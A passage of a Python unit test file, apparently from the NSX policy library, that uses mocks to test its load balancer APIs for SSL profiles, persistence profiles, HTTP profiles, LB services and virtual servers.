self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_create_without_id(self):
name = 'd1'
description = 'desc'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name, description=description,
tenant=TEST_TENANT)
expected_def = lb_defs.LBClientSslProfileDef(
client_ssl_profile_id=mock.ANY,
name=name,
description=description,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBClientSslProfileDef(
client_ssl_profile_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBClientSslProfileDef(
client_ssl_profile_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [{'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = lb_defs.LBClientSslProfileDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
with mock.patch.object(self.policy_api, "list",
return_value={'results': []}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = lb_defs.LBClientSslProfileDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_update(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
with self.mock_get(obj_id, name), \
self.mock_create_update() as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
tenant=TEST_TENANT)
expected_def = lb_defs.LBClientSslProfileDef(
client_ssl_profile_id=obj_id,
name=name,
description=description,
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBServerSSLProfileApi(test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBServerSSLProfileApi, self).setUp()
self.resourceApi = self.policy_lib.load_balancer.server_ssl_profile
def test_create_with_id(self):
name = 'd1'
description = 'desc'
obj_id = '111'
protocols = ['TLS_V1_1']
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name,
server_ssl_profile_id=obj_id,
description=description,
protocols=protocols,
tenant=TEST_TENANT)
expected_def = lb_defs.LBServerSslProfileDef(
server_ssl_profile_id=obj_id,
name=name,
description=description,
protocols=protocols,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_create_without_id(self):
name = 'd1'
description = 'desc'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name, description=description,
tenant=TEST_TENANT)
expected_def = lb_defs.LBServerSslProfileDef(
server_ssl_profile_id=mock.ANY,
name=name,
description=description,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBServerSslProfileDef(
server_ssl_profile_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBServerSslProfileDef(
server_ssl_profile_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [{'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = lb_defs.LBServerSslProfileDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
with mock.patch.object(self.policy_api, "list",
return_value={'results': []}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = lb_defs.LBServerSslProfileDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_update(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
with self.mock_get(obj_id, name), \
self.mock_create_update() as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
tenant=TEST_TENANT)
expected_def = lb_defs.LBServerSslProfileDef(
server_ssl_profile_id=obj_id,
name=name,
description=description,
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBPersistenceProfile(
test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBPersistenceProfile, self).setUp()
self.resourceApi = (
self.policy_lib.load_balancer.lb_persistence_profile)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = (
self.resourceApi.entry_def(
persistence_profile_id=obj_id,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = (
self.resourceApi.entry_def(
persistence_profile_id=obj_id,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [{'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = (
self.resourceApi.entry_def(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
with mock.patch.object(self.policy_api, "list",
return_value={'results': []}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = (
self.resourceApi.entry_def(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_wait_until_realized_fail(self):
pers_id = 'test_pers'
info = {'state': constants.STATE_UNREALIZED,
'realization_specific_identifier': pers_id}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
self.assertRaises(nsxlib_exc.RealizationTimeoutError,
self.resourceApi.wait_until_realized,
pers_id, max_attempts=5, sleep=0.1,
tenant=TEST_TENANT)
def test_wait_until_realized_succeed(self):
pers_id = 'test_pers'
info = {'state': constants.STATE_REALIZED,
'realization_specific_identifier': pers_id,
'entity_type': 'LbPersistenceProfileDto'}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
actual_info = self.resourceApi.wait_until_realized(
pers_id, entity_type='LbPersistenceProfileDto', max_attempts=5,
sleep=0.1, tenant=TEST_TENANT)
self.assertEqual(info, actual_info)
class TestPolicyLBCookiePersistenceProfile(
test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBCookiePersistenceProfile, self).setUp()
self.resourceApi = (
self.policy_lib.load_balancer.lb_cookie_persistence_profile)
def test_create_with_id(self):
name = 'd1'
description = 'desc'
obj_id = '111'
cookie_garble = 'test_garble'
cookie_name = 'test_name'
cookie_mode = 'INSERT'
cookie_path = 'path'
cookie_time = 'time'
persistence_shared = False
with self.mock_create_update() as api_call:
result = self.resourceApi.create_or_overwrite(
name,
persistence_profile_id=obj_id,
description=description,
cookie_name=cookie_name,
cookie_garble=cookie_garble,
cookie_mode=cookie_mode,
cookie_path=cookie_path,
cookie_time=cookie_time,
persistence_shared=persistence_shared,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBCookiePersistenceProfileDef(
persistence_profile_id=obj_id,
name=name,
description=description,
cookie_name=cookie_name,
cookie_garble=cookie_garble,
cookie_mode=cookie_mode,
cookie_path=cookie_path,
cookie_time=cookie_time,
persistence_shared=persistence_shared,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_create_without_id(self):
name = 'd1'
description = 'desc'
with self.mock_create_update() as api_call:
result = self.resourceApi.create_or_overwrite(
name, description=description,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBCookiePersistenceProfileDef(
persistence_profile_id=mock.ANY,
name=name,
description=description,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = (
lb_defs.LBCookiePersistenceProfileDef(
persistence_profile_id=obj_id,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = (
lb_defs.LBCookiePersistenceProfileDef(
persistence_profile_id=obj_id,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [
{'resource_type': self.resourceApi.entry_def.resource_type(),
'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = (
lb_defs.LBCookiePersistenceProfileDef(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [
{'resource_type': self.resourceApi.entry_def.resource_type(),
'display_name': 'profile1'},
{'resource_type': 'wrong_type',
'display_name': 'profile2'}]}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = (
lb_defs.LBCookiePersistenceProfileDef(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(1, len(result))
def test_update(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
cookie_garble = 'test_garble'
cookie_name = 'test_name'
cookie_mode = 'INSERT'
cookie_path = 'path'
cookie_time = 'time'
persistence_shared = False
with self.mock_get(obj_id, name), \
self.mock_create_update() as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
cookie_name=cookie_name,
cookie_garble=cookie_garble,
cookie_mode=cookie_mode,
cookie_path=cookie_path,
cookie_time=cookie_time,
persistence_shared=persistence_shared,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBCookiePersistenceProfileDef(
persistence_profile_id=obj_id,
name=name,
description=description,
cookie_name=cookie_name,
cookie_garble=cookie_garble,
cookie_mode=cookie_mode,
cookie_path=cookie_path,
cookie_time=cookie_time,
persistence_shared=persistence_shared,
tenant=TEST_TENANT))
self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBSourceIpProfileApi(test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBSourceIpProfileApi, self).setUp()
self.resourceApi = (
self.policy_lib.load_balancer.lb_source_ip_persistence_profile)
def test_create_with_id(self):
name = 'd1'
description = 'desc'
obj_id = '111'
ha = 'ha'
persistence_shared = True
purge = 'purge'
timeout = 100
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name,
persistence_profile_id=obj_id,
description=description,
ha_persistence_mirroring_enabled=ha,
persistence_shared=persistence_shared,
purge=purge,
timeout=timeout,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
persistence_profile_id=obj_id,
name=name,
description=description,
ha_persistence_mirroring_enabled=ha,
persistence_shared=persistence_shared,
purge=purge,
timeout=timeout,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_create_without_id(self):
name = 'd1'
description = 'desc'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name, description=description,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
persistence_profile_id=mock.ANY,
name=name,
description=description,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
persistence_profile_id=obj_id,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
persistence_profile_id=obj_id,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [
{'resource_type': self.resourceApi.entry_def.resource_type(),
'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
profiles = [{'resource_type': 'LBSourceIpPersistenceProfile',
'id': 'default-source-ip-lb-persistence-profile',
'display_name': 'default-source-ip-profile'}]
with mock.patch.object(self.policy_api, "list",
return_value={'results': profiles}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(profiles, result)
def test_list_different_type(self):
profiles = [{'resource_type': 'LBSourceCookiePersistenceProfile',
'id': 'default-source-ip-lb-persistence-profile',
'display_name': 'default-source-ip-profile'}]
with mock.patch.object(self.policy_api, "list",
return_value={'results': profiles}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_list_empty(self):
with mock.patch.object(self.policy_api, "list",
return_value={'results': []}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_update(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
ha = False
persistence_shared = False
purge = 'no purge'
timeout = 101
with self.mock_get(obj_id, name), \
self.mock_create_update() as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
ha_persistence_mirroring_enabled=ha,
persistence_shared=persistence_shared,
purge=purge,
timeout=timeout,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
persistence_profile_id=obj_id,
name=name,
description=description,
ha_persistence_mirroring_enabled=ha,
persistence_shared=persistence_shared,
purge=purge,
timeout=timeout,
tenant=TEST_TENANT))
self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBApplicationProfile(test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBApplicationProfile, self).setUp()
self.resourceApi = self.policy_lib.load_balancer.lb_http_profile
def test_create_with_id(self):
name = 'd1'
description = 'desc'
obj_id = '111'
http_redirect_to_https = False
http_redirect_to = "sample-url"
idle_timeout = 100
ntlm = False
request_body_size = 1025
request_header_size = 10
response_header_size = 10
response_timeout = 10
x_forwarded_for = 'INSERT'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name,
lb_app_profile_id=obj_id,
description=description,
http_redirect_to_https=http_redirect_to_https,
http_redirect_to=http_redirect_to,
idle_timeout=idle_timeout,
ntlm=ntlm,
request_body_size=request_body_size,
request_header_size=request_header_size,
response_header_size=response_header_size,
response_timeout=response_timeout,
x_forwarded_for=x_forwarded_for,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBHttpProfileDef(
lb_app_profile_id=obj_id,
name=name,
description=description,
http_redirect_to_https=http_redirect_to_https,
http_redirect_to=http_redirect_to,
idle_timeout=idle_timeout,
ntlm=ntlm,
request_body_size=request_body_size,
request_header_size=request_header_size,
response_header_size=response_header_size,
response_timeout=response_timeout,
x_forwarded_for=x_forwarded_for,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_fast_tcp_profile_def(self):
obj_dict = {'close_timeout': 8,
'ha_flow_mirroring_enabled': False,
'idle_timeout': 100}
fast_tcp_profile_def = lb_defs.LBFastTcpProfile(**obj_dict)
self.assertDictContainsSubset(obj_dict,
fast_tcp_profile_def.get_obj_dict())
def test_fast_udp_profile_def(self):
obj_dict = {'flow_mirroring_enabled': False,
'idle_timeout': 100}
fast_udp_profile_def = lb_defs.LBFastUdpProfile(**obj_dict)
self.assertDictContainsSubset(obj_dict,
fast_udp_profile_def.get_obj_dict())
def test_http_profile_def(self):
obj_dict = {'http_redirect_to_https': False,
'http_redirect_to': "sample-url",
'idle_timeout': 100,
'ntlm': False,
'request_body_size': 1025,
'request_header_size': 10,
'response_header_size': 10,
'response_timeout': 10,
'x_forwarded_for': 'INSERT'}
http_profile_def = lb_defs.LBHttpProfileDef(**obj_dict)
self.assertDictContainsSubset(obj_dict,
http_profile_def.get_obj_dict())
def test_create_without_id(self):
name = 'd1'
description = 'desc'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name, description=description,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBHttpProfileDef(
lb_app_profile_id=mock.ANY,
name=name,
description=description,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = (
lb_defs.LBHttpProfileDef(
lb_app_profile_id=obj_id,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = (
lb_defs.LBHttpProfileDef(
lb_app_profile_id=obj_id,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [{'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = (
lb_defs.LBHttpProfileDef(tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
with mock.patch.object(self.policy_api, "list",
return_value={'results': []}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = (
lb_defs.LBHttpProfileDef(tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_update(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
with self.mock_get(obj_id, name), \
self.mock_create_update() as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBHttpProfileDef(
lb_app_profile_id=obj_id,
name=name,
description=description,
tenant=TEST_TENANT))
self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBService(test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBService, self).setUp()
self.resourceApi = self.policy_lib.load_balancer.lb_service
def test_create_with_id(self):
name = 'd1'
description = 'desc'
obj_id = '111'
size = 'SMALL'
connectivity_path = 'path'
relax_scale_validation = True
with self.mock_create_update() as api_call:
result = self.resourceApi.create_or_overwrite(
name,
lb_service_id=obj_id,
description=description,
size=size,
connectivity_path=connectivity_path,
relax_scale_validation=relax_scale_validation,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBServiceDef(
nsx_version=self.policy_lib.get_version(),
lb_service_id=obj_id,
name=name,
description=description,
size=size,
connectivity_path=connectivity_path,
relax_scale_validation=relax_scale_validation,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_create_without_id(self):
name = 'd1'
description = 'desc'
with self.mock_create_update() as api_call:
result = self.resourceApi.create_or_overwrite(
name, description=description,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBServiceDef(lb_service_id=mock.ANY,
name=name,
description=description,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_create_with_unsupported_attribute(self):
name = 'd1'
description = 'desc'
relax_scale_validation = True
with self.mock_create_update() as api_call, \
mock.patch.object(self.resourceApi, 'version', '0.0.0'):
result = self.resourceApi.create_or_overwrite(
name, description=description,
relax_scale_validation=relax_scale_validation,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBServiceDef(lb_service_id=mock.ANY,
name=name,
description=description,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBServiceDef(
lb_service_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBServiceDef(
lb_service_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [{'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = lb_defs.LBServiceDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def _test_list(self, silent=False, silent_if_empty=False):
s1 = {'id': 'xxx', 'display_name': 'yyy'}
with mock.patch.object(self.policy_api, "list",
return_value={'results': [s1]}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT, silent=silent,
silent_if_empty=silent_if_empty)
expected_def = lb_defs.LBServiceDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([s1], result)
def test_list(self):
self._test_list()
def test_list_total_silence(self):
self._test_list(silent=True)
def test_list_silent_if_empty(self):
self._test_list(silent_if_empty=True)
def test_update(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
size = 'SMALL'
connectivity_path = 'path'
relax_scale_validation = True
with self.mock_get(obj_id, name), \
self.mock_create_update() as update_call:
self.resourceApi.update(
obj_id,
name=name,
description=description,
tenant=TEST_TENANT,
size=size,
connectivity_path=connectivity_path,
relax_scale_validation=relax_scale_validation)
expected_def = lb_defs.LBServiceDef(
nsx_version=self.policy_lib.get_version(),
lb_service_id=obj_id,
name=name,
description=description,
tenant=TEST_TENANT,
size=size,
connectivity_path=connectivity_path,
relax_scale_validation=relax_scale_validation)
self.assert_called_with_def(update_call, expected_def)
def test_update_customized(self):
obj_id = '111'
name = 'name'
tags = [{'tag': '1', 'scope': '2'}]
def update_callback(body):
body['tags'] = tags
with self.mock_get(obj_id, name), \
mock.patch.object(self.policy_api.client, "update") as update_call:
self.resourceApi.update_customized(
obj_id, update_callback)
update_call.assert_called_once_with(
'infra/lb-services/%s' % obj_id,
{'id': obj_id, 'display_name': name,
'resource_type': 'LBService',
'tags': tags})
def test_get_status(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get") as api_call:
self.resourceApi.get_status(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBServiceStatusDef(
lb_service_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_get_statistics(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get") as api_call:
self.resourceApi.get_statistics(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBServiceStatisticsDef(
lb_service_id=obj_id,
realtime=False,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual('%s/lb-services/%s/statistics/',
expected_def.path_pattern)
def test_get_statistics_realtime(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get") as api_call:
self.resourceApi.get_statistics(obj_id, realtime=True,
tenant=TEST_TENANT)
expected_def = lb_defs.LBServiceStatisticsDef(
lb_service_id=obj_id,
realtime=True,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual('%s/lb-services/%s/statistics?source=realtime',
expected_def.path_pattern)
def test_get_virtual_server_status(self):
obj_id = '111'
vs_id = '222'
with mock.patch.object(self.policy_api, "get") as api_call:
self.resourceApi.get_virtual_server_status(
obj_id, vs_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBVirtualServerStatusDef(
lb_service_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_get_usage(self):
lbs_id = 'test_vs'
with mock.patch.object(self.policy_api, "get") as api_call:
self.resourceApi.get_usage(
lbs_id, realtime=True, tenant=TEST_TENANT)
expected_def = lb_defs.LBServiceUsageDef(
lb_service_id=lbs_id,
realtime=True,
tenant=TEST_TENANT)
expected_path = '%s/lb-services/%s/service-usage?source=realtime'
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(expected_def.path_pattern, expected_path)
def test_wait_until_realized_fail(self):
lbs_id = 'test_lbs'
info = {'state': constants.STATE_UNREALIZED,
'realization_specific_identifier': lbs_id,
'entity_type': 'LbServiceDto'}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
self.assertRaises(nsxlib_exc.RealizationTimeoutError,
self.resourceApi.wait_until_realized,
lbs_id, max_attempts=5, sleep=0.1,
tenant=TEST_TENANT)
def test_wait_until_realized_error(self):
lbs_id = 'test_lbs'
error_code = 23500
related_error_code = 23707
error_msg = 'Found errors in the request.'
related_error_msg = 'Exceed maximum number of load balancer.'
info = {'state': constants.STATE_ERROR,
'realization_specific_identifier': lbs_id,
'entity_type': 'LbServiceDto',
'alarms': [{
'message': error_msg,
'error_details': {
'related_errors': [{
'error_code': related_error_code,
'module_name': 'LOAD-BALANCER',
'error_message': related_error_msg
}],
'error_code': error_code,
'module_name': 'LOAD-BALANCER',
'error_message': error_msg
}
}]}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
with self.assertRaises(nsxlib_exc.RealizationErrorStateError) as e:
self.resourceApi.wait_until_realized(
lbs_id, tenant=TEST_TENANT)
error_msg_tail = "%s: %s" % (error_msg, related_error_msg)
self.assertTrue(e.exception.msg.endswith(error_msg_tail))
self.assertEqual(e.exception.error_code, error_code)
self.assertEqual(e.exception.related_error_codes,
[related_error_code])
def test_wait_until_realized_succeed(self):
lbs_id = 'test_lbs'
info = {'state': constants.STATE_REALIZED,
'realization_specific_identifier': lbs_id,
'entity_type': 'LbServiceDto'}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
actual_info = self.resourceApi.wait_until_realized(
lbs_id, max_attempts=5, sleep=0.1, tenant=TEST_TENANT)
self.assertEqual(info, actual_info)
class TestPolicyLBVirtualServer(test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBVirtualServer, self).setUp()
self.resourceApi = self.policy_lib.load_balancer.virtual_server
def test_create_with_id(self):
name = 'd1'
description = 'desc'
obj_id = '111'
waf_profile_id = 'waf'
waf_profile_path = self.policy_lib.waf_profile.get_path(
profile_id=waf_profile_id, tenant=TEST_TENANT)
waf_profile_binding = lb_defs.WAFProfileBindingDef(
waf_profile_path=waf_profile_path)
lb_acl = self.resourceApi.build_access_list_control(
constants.ACTION_ALLOW, 'fake_group_path', True)
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name,
virtual_server_id=obj_id,
waf_profile_binding=waf_profile_binding,
description=description,
access_list_control=lb_acl,
tenant=TEST_TENANT)
expected_def = lb_defs.LBVirtualServerDef(
nsx_version=self.policy_lib.get_version(),
virtual_server_id=obj_id, name=name, description=description,
waf_profile_binding=waf_profile_binding,
access_list_control=lb_acl.get_obj_dict(),
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_create_without_id(self):
name = 'd1'
description = 'desc'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name, description=description,
tenant=TEST_TENANT)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=mock.ANY, name=name, description=description,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBVirtualServerDef(
virtual_server_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
